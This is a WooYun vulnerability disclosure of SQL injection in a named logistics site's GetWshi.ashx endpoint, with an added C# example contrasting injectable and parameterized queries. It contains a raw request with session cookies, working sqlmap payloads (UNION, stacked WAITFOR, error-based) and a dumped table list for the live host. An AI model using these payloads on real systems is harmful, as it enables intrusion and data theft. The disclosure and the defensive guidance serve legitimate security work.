Vulnerability Summary

Defect ID: wooyun-2015-0153405

Title: SQL injection in a site of 中国物通网 (China Wutong)

Vendor: 中国物通网

Reporter: 路人甲

Submitted: 2015-11-11 10:21

Fix time: 2015-11-24 07:14

Published: 2015-11-24 07:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-11-11: Details sent to the vendor; awaiting vendor response
2015-11-24: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

POST /Ashx/GetWshi.ashx?companyName=%25u4E91%25u5357%25u6B63%25u901A%25u5FB7%25u4FE1%25u8D27%25u8FD0%25u6709%25u9650%25u516C%25u53F8&cust_id=1072364&pid=1&wshiCity=%25u4E91%25u5357%25u7701%25u6606%25u660E%25u5E02 HTTP/1.1
Content-Length: 485
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=xmz5ifblol3dv4qgymnrpd00; TemGold_1072364=1,14,4,3,5,6,11,12,10,13; TemFormat_1072364=lsrb; BAIDUID=8E474BC330333966DD7B0C2263535823:FG=1; Hm_lvt_b056f6db54a055cf5bfde997b9ed913f=1447121410,1447121416,1447121458,1447121708; Hm_lpvt_b056f6db54a055cf5bfde997b9ed913f=1447121708; Hm_lvt_d653978debccea19667b401ab77ac0ad=1447121410,1447121416,1447121458,1447121708; Hm_lpvt_d653978debccea19667b401ab77ac0ad=1447121708; HMACCOUNT=A63704B16C8F6603
Host: ynztwl.chinawutong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
companyName=%25u4E91%25u5357%25u6B63%25u901A%25u5FB7%25u4FE1%25u8D27%25u8FD0%25u6709%25u9650%25u516C%25u53F8&cust_id=123&kind=%25u914D%25u8D27%25u4FE1%25u606F%25u90E8&pid=1&random=0.7215899890288711&toCity=%25u94DC%25u5DDD%25u5E02&toPro=%25u9655%25u897F%25u7701&wshiCity=%25u4E91%25u5357%25u7701%25u6606%25u660E%25u5E02

[Screenshot: 1.png]

[Screenshot: 2.png]

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cust_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 AND 8050=8050&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 AND 4256=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4256=4256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113)))&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1280=1280) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113))&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123;WAITFOR DELAY '0:0:5'--&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 WAITFOR DELAY '0:0:5'&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(104)+CHAR(109)+CHAR(84)+CHAR(87)+CHAR(97)+CHAR(101)+CHAR(66)+CHAR(101)+CHAR(90)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: Wutong
[229 tables]
+----------------------------------------+
| AIRPORT |
| Admin |
| Appraise |
| BlackList |
| CARRIER |
| CW_Device |
| CarLineUrl |
| Cert_Car |
| ChengYunOrder |
| ClickLog |
| CoPicture |
| Collect_Car |
| Collect_Car |
| Coupons |
| CustLink |
| CustLocation |
| DiaoCha |
| DomainList |
| EmailTriggerRecord |
| Emails |
| GY_CharityCom |
| GY_EmergencyContact |
| GY_EmergencyGoods |
| GY_contribute |
| GY_help |
| GY_safety |
| GY_searchPerson |
| GjHuo |
| Gonggao |
| GoodsDetail |
| GpsAuthorization |
| GpsInfo |
| HRAbility |
| HRCoverLetter |
| HREducation |
| HRExperience |
| HRFavJob |
| HRFavSeeker |
| HRJobCityPK |
| HRJobs |
| HRPostSeekerPK |
| HRSeekerCompayPK |
| HRSeekerCompayPK |
| HRTrain |
| HighlyRecommend |
| HotmainLine |
| IDcardCheck |
| IMEI |
| ImgLocation |
| InterAir |
| InterAirReq |
| InterLine |
| InterShipping |
| InterShippingReq |
| LISTAreas |
| LP_AD |
| LP_AutoRepair |
| LP_Bath |
| LP_CarPark |
| LP_Catering |
| LP_Culture |
| LP_Hotel |
| LP_HouseRent |
| LP_LogisticsCom |
| LP_Merchants |
| LP_News |
| LP_NewsType |
| LP_Show |
| LP_TemplateAD |
| LP_WearHouse |
| LoginRecord |
| LongSourceHY |
| LongSourceHY |
| MSpeer_conflictdetectionconfigrequest |
| MSpeer_conflictdetectionconfigresponse |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| MSpeer_request |
| MSpeer_response |
| MSpeer_topologyrequest |
| MSpeer_topologyresponse |
| MSpub_identity_range |
| MailTemp |
| MemberLogin |
| ModelKey |
| Nations |
| NewsCata |
| NewsCata |
| NewsClass |
| NewsData |
| OwnerContract |
| OwnersInsurance |
| PageNum |
| PayLog |
| Picture_Licence |
| Product |
| RankOne |
| RankTwo |
| Refuse_Collect |
| ReturnPwd |
| SEAPORT |
| SMT_ypxxone |
| SMT_ypxxtwo |
| SendEmailRecord |
| ServiceRecord |
| SourceRecord |
| Temp |
| TenderDocument |
| TextLocation |
| TopContacts |
| TopGoods |
| TuiSong |
| Url_Gj |
| Url_Query |
| UserGPS |
| VI_CarLine |
| VI_SpecialLinePH |
| VI_SpecialLinePH |
| VI_Wshi |
| Vi_Company |
| Vi_HRApplySeeker |
| VoicWshi |
| WapLog |
| WebBlackUser |
| WebLink |
| WebLog |
| WliuZbiao |
| adminrizhi |
| androidImg |
| android_Activities |
| android_Products |
| android_Recommend |
| banjia |
| bshi |
| bumen |
| bx_CusInsureInfo |
| bx_ParamsInsureInfo |
| bx_categories |
| bx_conveyances |
| bx_packages |
| bx_plan |
| bx_points |
| bx_xyzBackContent |
| caiwu |
| cheLine |
| chezhu |
| china_ad |
| com |
| config |
| daili |
| dtproperties |
| goq_Company |
| gpsUserInfo |
| huiyuan |
| huoOld |
| huo_order |
| huo_order |
| huo_print |
| huodong_order |
| infomationAppraise |
| jiameng_order |
| jianli |
| jop |
| keshi |
| ksheng |
| kshi |
| kuaijian |
| link |
| message |
| pay_information |
| powerUnit |
| push_CustomerTempThemes |
| push_CustomerTopic |
| push_QuartzTable |
| push_Themes |
| push_autoPublish |
| push_roborder |
| qiyeView |
| qiyepic |
| qiyepic |
| renzheng_geren |
| renzheng_qiye |
| rolePower |
| sqlmapoutput |
| syncobj_0x3032423438383034 |
| syncobj_0x3439373531363345 |
| syncobj_0x3531423844353443 |
| syncobj_0x3630373132373946 |
| syncobj_0x3637443233313437 |
| syncobj_0x3739364335463539 |
| syncobj_0x3846364531304330 |
| syncobj_0x3846423930423839 |
| syncobj_0x3934324143354645 |
| syncobj_0x3938453936374632 |
| syncobj_0x4434363133443337 |
| syncobj_0x4438333843394444 |
| syncobj_0x4633453042374444 |
| sysarticlecolumns |
| sysarticles |
| sysarticleupdates |
| sysdiagrams |
| sysextendedarticlesview |
| syspublications |
| sysreplservers |
| sysschemaarticles |
| syssubscriptions |
| systranschemas |
| tb_BuyInfor |
| tb_OneLeve |
| tb_SupplyInfor |
| tb_TwoLeve |
| tc_car |
| tem_userset |
| userPower |
| view_Prize |
| wsheng |
| wshiLinShi |
| wshiLinShi |
| wshiMainlineLinShi |
| wshiMainline_Price |
| wshiMainline_Price |
| wshiOrder |
| wxt_dd |
| yanzheng_jiashi |
| yanzheng_xingshi |
| ygrizhi |
| yuangong |
| zhaoshang |
| zhengshu |
+----------------------------------------+
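Every injection type sqlmap reports above (boolean-based blind, error-based, inline query, stacked queries, time-based blind and UNION) has the same root cause: the cust_id value is spliced into the SQL text instead of being bound as a typed parameter. The following is an added example, not the vendor's code, showing how a hypothetical .ashx handler on this stack (ASP.NET 4.0 with SQL Server 2008) would look in its injectable form and in its fixed form. The handler class name, the "Wutong" connection-string entry, the columns cust_id and wshiCity, and the choice of the VI_Wshi table (it merely appears in the table list) are all assumptions.

```csharp
// Added example, not the vendor's code: a hypothetical ASP.NET .ashx handler
// reading the cust_id POST parameter. Class name, connection-string entry,
// table and column names are assumptions, not taken from the report.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public class GetWshiHandler : IHttpHandler
{
    // Assumed connection-string entry in web.config.
    private static readonly string ConnStr =
        ConfigurationManager.ConnectionStrings["Wutong"].ConnectionString;

    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext context)
    {
        string custId = context.Request.Form["cust_id"];
        DataTable rows = LoadSafe(custId);
        if (rows == null)
        {
            context.Response.StatusCode = 400;   // cust_id was not a positive integer
            return;
        }
        context.Response.ContentType = "text/plain";
        context.Response.Write(rows.Rows.Count + " rows");
    }

    // INJECTABLE pattern: the raw parameter is concatenated into the statement,
    // so the values shown in the sqlmap output ("123 AND 8050=8050",
    // "123;WAITFOR DELAY '0:0:5'--", the UNION SELECT) become part of the SQL.
    private static DataTable LoadVulnerable(string custId)
    {
        string sql = "SELECT cust_id, wshiCity FROM VI_Wshi WHERE cust_id = " + custId;
        using (var conn = new SqlConnection(ConnStr))
        using (var da = new SqlDataAdapter(sql, conn))
        {
            var table = new DataTable();
            da.Fill(table);   // Fill opens and closes the connection itself
            return table;
        }
    }

    // FIXED pattern: validate the type first, then bind the value as a typed
    // parameter. The statement text is a constant, so no input can change its
    // structure; a second statement, WAITFOR or UNION is simply not SQL here.
    private static DataTable LoadSafe(string custId)
    {
        int id;
        if (!int.TryParse(custId, out id) || id <= 0)
            return null;

        const string sql =
            "SELECT cust_id, wshiCity FROM VI_Wshi WHERE cust_id = @cust_id";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@cust_id", SqlDbType.Int).Value = id;
            var table = new DataTable();
            using (var da = new SqlDataAdapter(cmd))
            {
                da.Fill(table);
            }
            return table;
        }
    }
}
```

LoadSafe rejects anything that is not a positive integer before the query is built and binds the value with SqlDbType.Int, so the query structure is fixed when the code is compiled. Two points the dump supports beyond the code: the table list contains sqlmapoutput, which indicates the application's database login was able to create tables, so that login should be limited to the SELECT rights the handler needs; and because stacked queries and WAITFOR DELAY worked, a run of requests to GetWshi.ashx with roughly five-second response times in the IIS logs is a practical detection signal for this class of probing.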

Proof of vulnerability:

Fix recommendation:

Copyright: when reproducing, credit the source as 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: No impact, vendor ignored

Ignored on: 2015-11-24 07:14

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet